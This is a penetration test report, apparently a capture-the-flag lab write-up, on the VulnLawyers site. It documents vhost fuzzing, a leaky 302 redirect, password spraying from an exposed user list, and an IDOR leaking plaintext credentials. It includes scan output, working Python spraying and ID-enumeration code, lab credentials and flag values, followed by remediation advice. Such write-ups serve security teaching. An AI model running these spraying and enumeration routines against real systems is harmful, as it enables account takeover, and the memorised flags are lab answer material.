Penetration Test Report - VulnLawyers


Introduction
The purpose of this report is to summarize the findings of a penetration test of the client’s web application, capture all six flags, and document the vulnerabilities found along the way.
Client: VulnLawyers
Testing Date: June 5, 2025
Scope: http://kaye.ctfio.com
Test Duration: 59 Minutes
Executive Summary
A rapid penetration test of VulnLawyers’ website (kaye.ctfio.com) was conducted over 59 minutes. Six flags were captured by chaining subdomain (virtual host) enumeration, content discovery, a redirect that leaked its rendered page body, password spraying against an exposed user list, and an IDOR (Insecure Direct Object Reference) in the staff portal that disclosed another user’s credentials.
Methodology
The test was conducted using the following tools:
Dirsearch: used for directory and file enumeration on each host, revealing entry points for further exploitation.
ffuf: used for subdomain enumeration by fuzzing the Host header against the in-scope host, so that every virtual host answered by the server could be identified and assessed.
Caido: used as the intercepting proxy for web application assessment, to inspect raw responses, identify weaknesses and build targeted requests (including the credential spray).
Technical Findings & Flag Acquisition
Flag 1:
[^FLAG^E78DEBBFDFBEAFF1336B599B0724A530^FLAG^]
Vulnerability: Sensitive data exposed on an unlinked subdomain, http://data.kaye.ctfio.com, discovered through subdomain enumeration.
Method: ffuf was used to fuzz the Host header with a subdomain wordlist, which revealed data.kaye.ctfio.com:
:: Method : GET
:: URL : https://kaye.ctfio.com/
:: Wordlist : FUZZ: /home/nexxsys/Documents/Hackinghub/Missions/VulnLawyers/subdomains.txt
:: Header : Host: FUZZ.kaye.ctfio.com
:: Header : User-Agent: PENTEST
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 1
data [Status: 200, Size: 109, Words: 3, Lines: 1, Duration: 145ms]
:: Progress: [1907/1907] :: Job [1/1] :: 273 req/sec :: Duration: [0:00:07] :: Errors: 0 ::
Navigating to the subdomain data.kaye.ctfio.com revealed the first flag (listed above).
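The ffuf run above is, in effect, a Host-header fuzzer with a baseline filter: every candidate name is sent to the same server and only responses that differ from the catch-all virtual host are kept. The following is an added example (not code from the report or from ffuf) that implements that logic in Python. The network transport is injected so the function can be exercised offline against a constructed stand-in; the `live_transport` helper uses only the standard library and assumes the same URL, Host pattern and User-Agent as the scan above.

```python
"""Host-header (virtual host) fuzzing with baseline filtering.

Added example; this is not code from the report or from ffuf. It reproduces the
logic of the ffuf run above: send the same request to the in-scope host with a
different Host header per wordlist entry and keep only responses that differ
from what the catch-all virtual host returns for a name that cannot exist.
"""
from __future__ import annotations

import secrets
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Tuple

# A transport takes a Host header value and returns (status, body).
Transport = Callable[[str], Tuple[int, bytes]]

# Same status set ffuf matched on in the scan above.
INTERESTING = frozenset({200, 301, 302, 307, 401, 403, 405, 500})


def fuzz_vhosts(domain: str, words: Iterable[str], transport: Transport) -> List[Tuple[str, int, int]]:
    """Return (hostname, status, body_size) for every candidate whose response
    differs from the baseline answer for a random, nonexistent label."""
    # Calibration: a name that cannot exist shows what the default vhost returns.
    base_status, base_body = transport(f"{secrets.token_hex(8)}.{domain}")
    baseline_sig = (base_status, len(base_body))

    hits: List[Tuple[str, int, int]] = []
    for word in words:
        host = f"{word}.{domain}"
        status, body = transport(host)
        if status in INTERESTING and (status, len(body)) != baseline_sig:
            hits.append((host, status, len(body)))
    return hits


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects; a 301/302 is itself the signal we want."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def live_transport(url: str, user_agent: str = "PENTEST", timeout: int = 10) -> Transport:
    """Build a transport that requests `url` with an overridden Host header
    (stdlib only; urllib honours an explicit Host header)."""
    opener = urllib.request.build_opener(_NoRedirect)

    def send(host: str) -> Tuple[int, bytes]:
        req = urllib.request.Request(url, headers={"Host": host, "User-Agent": user_agent})
        try:
            with opener.open(req, timeout=timeout) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:  # 3xx/4xx/5xx arrive here
            return err.code, err.read()

    return send


def demo_transport(host: str) -> Tuple[int, bytes]:
    """Constructed offline stand-in: the catch-all answers every unknown name
    with a 1-byte 200 (the size ffuf filtered out above); only `data` differs."""
    if host == "data.kaye.ctfio.com":
        return 200, b"<p>constructed body standing in for the real subdomain</p>"
    return 200, b"."


if __name__ == "__main__":
    # Offline run against the constructed transport. For a live run, pass
    # live_transport("https://kaye.ctfio.com/") instead of demo_transport.
    for host, status, size in fuzz_vhosts("kaye.ctfio.com", ["www", "data", "dev", "mail"], demo_transport):
        print(f"{host} [Status: {status}, Size: {size}]")
```

The calibration step is what ffuf’s `-ac` option automates; here the 1-byte catch-all response is learned from a random label rather than hard-coded as a size filter, so the same code works against a server whose default response is larger.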
Flag 2:
[^FLAG^FB52470E40F47559EBA87252B2D4CF67^FLAG^]
Vulnerability: Redirect response that still renders page content (information leak in a 302 body).
Method: Requesting http://kaye.ctfio.com/login returned a 302 to /denied, but the response body still contained the rendered page, which revealed the hidden path /lawyers-only and the second flag. The dirsearch scan results:
[22:07:50] Starting:
[22:07:53] 301 - 178B - /js -> https://kaye.ctfio.com/js/
[22:08:26] 301 - 178B - /css -> https://kaye.ctfio.com/css/
[22:08:35] 301 - 178B - /images -> https://kaye.ctfio.com/images/
[22:08:35] 403 - 564B - /images/
[22:08:37] 403 - 564B - /js/
[22:08:39] 302 - 1KB - /login -> /denied
[22:08:39] 302 - 1KB - /login/ -> /denied
Target: https://kaye.ctfio.com/
Time Stamps: The scan started at 22:07:50 and the entries above were returned within the first minute.
Key Findings & Interpretation:
- /js and /css: both returned a 301 to their trailing-slash form. JavaScript files are worth reviewing because client-side code frequently references hidden endpoints or embeds secrets; nothing of interest was found in either directory. [None found]
- /images: the 301 resolved to a 403 on /images/, meaning the directory exists but listing is forbidden. This is ordinary hardening rather than a misleading path. [None found]
- /login: returned a 302 to /denied, but with a 1 KB body. A clean redirect carries little or no body, so a 1 KB response on a 302 indicates the server kept rendering the page after issuing the redirect. This was the critical piece of information. [Investigated]
- Requesting /login (http://kaye.ctfio.com/login) in Caido, which shows the raw response rather than following the redirect, revealed the second flag [^FLAG^FB52470E40F47559EBA87252B2D4CF67^FLAG^] and a new path: /lawyers-only.
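Tools that follow redirects automatically would only ever show the /denied page, which is why the leaked body went unnoticed by the application’s owners. The following is an added example (not code from the report) of a small check that inspects a raw response and reports any redirect whose body is large enough to be a rendered page, pulling out the paths and flag-format tokens it contains. The 302 response it runs on is constructed to have the shape described above; the flag token in it is a placeholder, not a real flag.

```python
"""Detect redirects that still carry page content.

Added example, not code from the report. A 302 from a well-behaved application
has an empty or boilerplate body; the /login response above was a 302 to /denied
with a 1 KB body, which is how the hidden path and the flag were exposed.
"""
from __future__ import annotations

import re
from typing import Dict, List, Mapping

# Flag format used throughout this engagement.
FLAG_RE = re.compile(r"\[\^FLAG\^[0-9A-F]{32}\^FLAG\^\]")
# Absolute paths in href/src/action attributes.
PATH_RE = re.compile(r'(?:href|src|action)\s*=\s*["\'](/[^"\'#?]*)', re.I)

# Above this size a redirect body is worth reading by hand. Small boilerplate
# ("Redirecting to /denied") stays under it; a rendered page does not.
BODY_THRESHOLD = 256


def analyse_redirect(status: int, headers: Mapping[str, str], body: bytes) -> Dict[str, object]:
    """Return a findings dict. `leaky` is True when a 3xx response carries a
    body larger than BODY_THRESHOLD; paths and flags are extracted either way."""
    text = body.decode("utf-8", errors="replace")
    location = next((v for k, v in headers.items() if k.lower() == "location"), None)
    paths: List[str] = sorted(set(PATH_RE.findall(text)))
    # Paths other than the redirect target are the ones the server meant to hide.
    hidden = [p for p in paths if p != location]
    return {
        "status": status,
        "location": location,
        "body_size": len(body),
        "leaky": 300 <= status < 400 and len(body) > BODY_THRESHOLD,
        "paths": hidden,
        "flags": FLAG_RE.findall(text),
    }


# Constructed 302 in the shape the report describes: Location says /denied,
# but the body is the rendered page. The flag token is a zero-filled placeholder.
SAMPLE_STATUS = 302
SAMPLE_HEADERS = {"Location": "/denied", "Content-Type": "text/html"}
SAMPLE_BODY = (
    b"<html><body><!-- " + b"x" * 300 + b" -->"
    + b'<a href="/lawyers-only">Staff login</a>'
    + b'<form action="/lawyers-only" method="post">'
    + b"<!-- [^FLAG^" + b"0" * 32 + b"^FLAG^] -->"
    + b"</form></body></html>"
)


def run_sample() -> Dict[str, object]:
    """Analyse the constructed response; used by the demo below."""
    return analyse_redirect(SAMPLE_STATUS, SAMPLE_HEADERS, SAMPLE_BODY)


if __name__ == "__main__":
    for key, value in run_sample().items():
        print(f"{key}: {value}")
```

To reproduce this against a live target, fetch without following redirects (`curl -si http://kaye.ctfio.com/login`, `allow_redirects=False` in Python’s requests, or the raw response view in Caido) and feed status, headers and body to `analyse_redirect`.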
Flag 3:
[^FLAG^25032EB0D322F7330182507FBAA1A55F^FLAG^]
- Vulnerability: Unauthenticated user listing exposed as JSON at /users on data.kaye.ctfio.com, found by content discovery on the subdomain obtained in Flag 1.
- Method: dirsearch was run against the subdomain with the client-supplied wordlist:
dirsearch -u data.kaye.ctfio.com -w content.txt
# Results
Output File: /home/nexxsys/Documents/Hackinghub/Missions/VulnLawyers/reports/_data.kaye.ctfio.com/_25-06-05_22-48-14.txt
Target: https://data.kaye.ctfio.com/
[22:48:14] Starting:
[22:48:45] 200 - 396B - /users
Task Completed
Target: data.kaye.ctfio.com
Wordlist: content.txt (supplied by the client)
Task Completed: The scan completed successfully and identified a single path.
Result: 200 - 396B - /users – This is the significant finding. The 200 status code indicates the request succeeded and 396B is the size of the response body. Requesting https://data.kaye.ctfio.com/users returned a JSON (JavaScript Object Notation) listing of user names and e-mail addresses together with the third flag:
{
"users": [
{
"name": "Yusef Mcclain",
"email": "yusef.mcclain@vulnlawyers.ctf"
},
{
"name": "Shayne Cairns",
"email": "shayne.cairns@vulnlawyers.ctf"
},
{
"name": "Eisa Evans",
"email": "eisa.evans@vulnlawyers.ctf"
},
{
"name": "Jaskaran Lowe",
"email": "jaskaran.lowe@vulnlawyers.ctf"
},
{
"name": "Marsha Blankenship",
"email": "marsha.blankenship@vulnlawyers.ctf"
}
],
"flag": "[^FLAG^25032EB0D322F7330182507FBAA1A55F^FLAG^]"
}
Flag 4:
[^FLAG^7F1ED1F306FC4E3399CEE15DF4B0AE3C^FLAG^]
Vulnerability: Weak password and no brute-force protection on the staff login. Using Caido’s Automate feature, the e-mail addresses from the /users listing were paired with the client-supplied passwords.txt in a password-spraying attack, which recovered the password for Jaskaran Lowe and granted access to the staff portal.
Findings: email=jaskaran.lowe@vulnlawyers.ctf & password=summer
Using these credentials, access to the staff portal was successful and revealed the fourth flag.
A single case is visible, managed by Shayne Cairns. Access to Shayne’s account would provide the permissions to manage this case and find the fifth flag.
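The spray above was run from Caido’s Automate; the following is an added example (not the report’s workflow or Caido’s code) of the same attack written out, so the mechanics are explicit: parse the /users JSON, then try one password across every account before moving to the next. The login call is injected and replaced here by a constructed authenticator, because the portal’s login form field names are not recorded in the report; the user list and password list below are likewise constructed.

```python
"""Password spraying driven by the /users JSON listing.

Added example; not the report's Caido workflow, but the same attack in code.
Spraying goes password-major (one password across all accounts, then the next),
which keeps per-account attempts low and is why lockout alone does not stop it.
"""
from __future__ import annotations

import json
from typing import Callable, Dict, Iterable, List, Optional, Tuple

LoginFn = Callable[[str, str], bool]  # (email, password) -> authenticated?


def emails_from_listing(raw: str) -> List[str]:
    """Pull e-mail addresses out of the /users JSON shown in Flag 3."""
    return [u["email"] for u in json.loads(raw)["users"]]


def spray(emails: Iterable[str], passwords: Iterable[str], try_login: LoginFn,
          max_attempts_per_account: Optional[int] = None) -> List[Tuple[str, str]]:
    """Try each password against every account before moving to the next one.
    Accounts drop out once a valid password is found or the per-account cap
    (if any) is reached. Returns the (email, password) pairs that authenticated."""
    remaining = list(emails)
    attempts: Dict[str, int] = {e: 0 for e in remaining}
    hits: List[Tuple[str, str]] = []
    for password in passwords:
        for email in list(remaining):
            if max_attempts_per_account is not None and attempts[email] >= max_attempts_per_account:
                remaining.remove(email)  # stay under the target's lockout threshold
                continue
            attempts[email] += 1
            if try_login(email, password):
                hits.append((email, password))
                remaining.remove(email)
        if not remaining:
            break
    return hits


# Constructed stand-ins for the /users listing, passwords.txt and the portal.
USERS_JSON = json.dumps({"users": [
    {"name": "Yusef Mcclain", "email": "yusef.mcclain@vulnlawyers.ctf"},
    {"name": "Jaskaran Lowe", "email": "jaskaran.lowe@vulnlawyers.ctf"},
]})
PASSWORDS = ["password", "winter", "summer", "autumn"]
_DEMO_CREDENTIALS = {"jaskaran.lowe@vulnlawyers.ctf": "summer"}  # the pair the spray found


def demo_login(email: str, password: str) -> bool:
    """Constructed authenticator standing in for a POST to the login form."""
    return _DEMO_CREDENTIALS.get(email) == password


def run_demo() -> List[Tuple[str, str]]:
    return spray(emails_from_listing(USERS_JSON), PASSWORDS, demo_login)


if __name__ == "__main__":
    for email, password in run_demo():
        print(f"email={email} & password={password}")
```

Against a real portal, `try_login` would POST the form and decide success from the status code or a redirect target (a 302 to the portal versus a 200 re-rendering the form); the `max_attempts_per_account` cap is there so an assessment does not lock out the client’s staff.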
Flag 5:
[^FLAG^938F5DC109A1E9B4FF3E3E92D29A56B3^FLAG^]
Vulnerability: IDOR (Insecure Direct Object Reference)
Method: While logged in as Jaskaran, the profile page http://kaye.ctfio.com/lawyers-only-profile-details/4 was examined in Caido. The trailing number is the user ID and is the only thing that controls whose record is returned; the server does not check that the record belongs to the requester. Changing 4 to 2 returned Shayne Cairns’s profile, including credentials, and the fifth flag.
Credentials found:
- email=shayne.cairns@vulnlawyers.ctf password=q2V944a1^3p
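The server side of the VulnLawyers application was not available to the test, so the following is an added example (not the application’s code) that models the behaviour observed at /lawyers-only-profile-details/<id>: a vulnerable handler that returns whatever record the URL names, the hardened handler that enforces object-level authorization and never returns secrets, and the ID walk that finds the difference. The records, IDs and passwords are constructed; only the URL shape comes from the report.

```python
"""IDOR on a profile-details endpoint: vulnerable handler, hardened handler,
and the enumeration that exposes the difference.

Added example, not the VulnLawyers application's code. Records and passwords
below are constructed; only the /lawyers-only-profile-details/<id> shape is real.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass(frozen=True)
class Session:
    user_id: int
    role: str = "lawyer"


# Constructed user store in the shape the endpoint leaked: plaintext passwords
# stored alongside the profile (a finding in itself).
PROFILES: Dict[int, Dict[str, str]] = {
    2: {"name": "Shayne Cairns", "email": "shayne.cairns@vulnlawyers.ctf", "password": "constructed-2"},
    4: {"name": "Jaskaran Lowe", "email": "jaskaran.lowe@vulnlawyers.ctf", "password": "constructed-4"},
}


class Forbidden(Exception):
    pass


def profile_details_vulnerable(session: Optional[Session], profile_id: int) -> Optional[Dict[str, str]]:
    """Mirrors the observed behaviour: any logged-in user may read any ID,
    password included. Authentication is checked; authorization is not."""
    if session is None:
        raise Forbidden("login required")
    return PROFILES.get(profile_id)


def profile_details_fixed(session: Optional[Session], profile_id: int) -> Optional[Dict[str, str]]:
    """Object-level authorization: the ID in the URL must belong to the caller
    (or the caller must be an admin), and secrets never leave the server."""
    if session is None:
        raise Forbidden("login required")
    if session.role != "admin" and session.user_id != profile_id:
        # Same answer as 'not found' so valid IDs cannot be confirmed by probing.
        return None
    record = PROFILES.get(profile_id)
    if record is None:
        return None
    return {k: v for k, v in record.items() if k != "password"}


def enumerate_profiles(fetch: Callable[[int], Optional[Dict[str, str]]], ids: range) -> List[int]:
    """Walk the ID space the way the test did (4 -> 2) and return the IDs
    that yielded a record."""
    return [i for i in ids if fetch(i) is not None]


def run_demo() -> Dict[str, object]:
    """Run the ID walk as Jaskaran (ID 4) against both handlers."""
    jaskaran = Session(user_id=4)
    return {
        "vulnerable_ids": enumerate_profiles(lambda i: profile_details_vulnerable(jaskaran, i), range(1, 6)),
        "fixed_ids": enumerate_profiles(lambda i: profile_details_fixed(jaskaran, i), range(1, 6)),
        "fixed_own": profile_details_fixed(jaskaran, 4),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The fix is two separate changes, and both matter: the ownership check closes the IDOR, and dropping the password from the response (ideally never storing it in plaintext at all) limits the damage if another authorization bug is found later.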
Flag 6:
[^FLAG^B38BAE0B8B804FCB85C730F10B3B5CB5^FLAG^]
Vulnerability: IDOR (Insecure Direct Object Reference) – As described above.
Logging in with Shayne’s credentials and deleting the case he has permission to manage revealed the sixth and final flag.
Overall Assessment
The rapid penetration test demonstrated broken access control (an IDOR in the staff portal and an unlinked, unauthenticated user listing), sensitive data exposure (plaintext credentials returned by a profile page and a redirect that leaked its rendered body), and weak authentication (a dictionary password accepted with no brute-force protection).
Risk Assessment
Target – http://kaye.ctfio.com
Asset: The http://kaye.ctfio.com web application, specifically the staff portal (/lawyers-only) and the profile-details endpoint behind it, which holds staff names, e-mail addresses and plaintext passwords and controls client case records.
- Value: The data is personally identifiable information (PII) and live credentials; compromise of the portal also exposes client matters.
Threats:
Account Takeover: Any authenticated staff member can read a colleague’s password and act in their name, as demonstrated with Shayne Cairns’s account and case.
Information Disclosure: The /login redirect leaks its rendered page to unauthenticated visitors, including the staff-portal path.
Reputational Damage: A law firm whose staff credentials can be read by other staff reflects poorly on the organization's security posture.
Vulnerabilities:
Broken Access Control: /lawyers-only-profile-details/<id> returns whichever record is named in the URL without checking that it belongs to the requester (IDOR).
Plaintext Credentials: Passwords are stored and returned in clear text rather than as salted hashes.
Weak Authentication: A dictionary password ("summer") was in use and the login form imposed no lockout or rate limiting during the spray.
Likelihood: Very High – The application was compromised end to end within an hour, confirming a high likelihood of real-world exploitation.
Impact: Medium to High – Depending on the sensitivity of the case data and the actions of an attacker, the impact ranges from disruption to significant financial and legal consequences.
Risk Level: Critical – Due to the combination of a very high likelihood and a medium to high impact.
Mitigation Recommendations:
Immediately enforce an ownership (or role) check on the profile-details endpoint and stop returning passwords in any response.
Store passwords as salted hashes and force a reset for all staff accounts.
Implement strict access controls for all application functionality.
Add rate limiting, account lockout and a password policy to the login form, and implement strong authentication (including MFA) for all user accounts.
Make /login a clean redirect (or serve the denied page directly) so that no page content is sent with a 302.
Conduct a thorough security audit to identify and remediate any remaining vulnerabilities.
Implement a web application firewall (WAF) to protect against common web attacks.
Implement an incident response plan to quickly respond to security incidents and minimize their impact.
Residual Risk: High – Until the access-control and credential-storage fixes are verified, any single staff credential remains a key to every other staff account. Continuous monitoring and proactive security measures are crucial.
Additional Considerations:
Root Cause Analysis: A thorough investigation is needed to determine how the vulnerability was introduced and to prevent similar issues in the future.
Security Awareness Training: Implement security awareness training for all developers and staff.
Target – data.kaye.ctfio.com
Asset: The data.kaye.ctfio.com web application, specifically the unauthenticated /users endpoint returning staff names and e-mail addresses.
- Value: The data represents personally identifiable information (PII) – names and e-mail addresses. Even without further exploitation, exposing it is a privacy breach and a compliance risk (depending on regulatory requirements); in this test it also supplied the account list for the password spray.
Threats:
Unauthorized Access: The exposed directory represents a significant attack surface. Threat actors could attempt to enumerate users, potentially leading to further exploitation.
Data Exfiltration: While no immediate exploitation was demonstrated, the possibility of targeted data exfiltration remains.
Credential Harvesting: Usernames and email addresses could be used in credential stuffing or phishing attacks.
Reputational Damage: A publicly accessible user directory reflects poorly on the security posture of the organization.
Vulnerabilities:
Lack of Access Controls: The directory is readily accessible without authentication, offering an open attack surface.
Unlinked but Unprotected Host: The subdomain is not referenced from the main site and relies on not being discovered, which a 1,907-entry wordlist defeated in seven seconds.
Weak Security Practices: The overall security posture suggests a lack of investment in security controls.
Likelihood: High – The vulnerability of a publicly accessible, unauthenticated user directory is inherently high.
Impact: Medium – Depending on how the list is used, the impact ranges from minor reputational damage to targeted phishing and credential attacks against staff, with the financial and legal consequences that follow.
Risk Level: High – Due to the combination of a high likelihood and a medium impact.
Mitigation Recommendations:
Implement Proper Input Validation
Enforce Robust Access Controls
Conduct Regular Security Audits
Update Software and Dependencies
Implement Strong Authentication Mechanisms
Use a Web Application Firewall (WAF)
Implement Incident Response Plan
Regularly Back Up Data
Residual Risk: Medium – Even with the implementation of mitigation recommendations, a residual risk remains due to the fundamental vulnerability of the exposed directory. Ongoing monitoring and proactive security measures are crucial.
Recommendation Summary
This penetration test highlights a chain of vulnerabilities: an exposed, unauthenticated user directory (names and e-mail addresses, plus a flag), a redirect that leaks page content, a weak staff password with no brute-force protection, and an IDOR that exposes other users’ credentials. Immediate action is required. The following needs to be prioritized:
Immediate Remediation: Removing or authenticating the exposed directory and fixing the authorization check on the profile-details endpoint are the highest priorities, followed by a password reset for all staff.
Strengthening Security Posture: A thorough security audit is essential to identify and rectify all remaining vulnerabilities.
Proactive Security Measures: Implementing a Web Application Firewall (WAF) and developing an Incident Response Plan are crucial for long-term protection and rapid response to future incidents.
Essentially, this needs to be treated as a critical security issue demanding swift and decisive action to mitigate potential harm.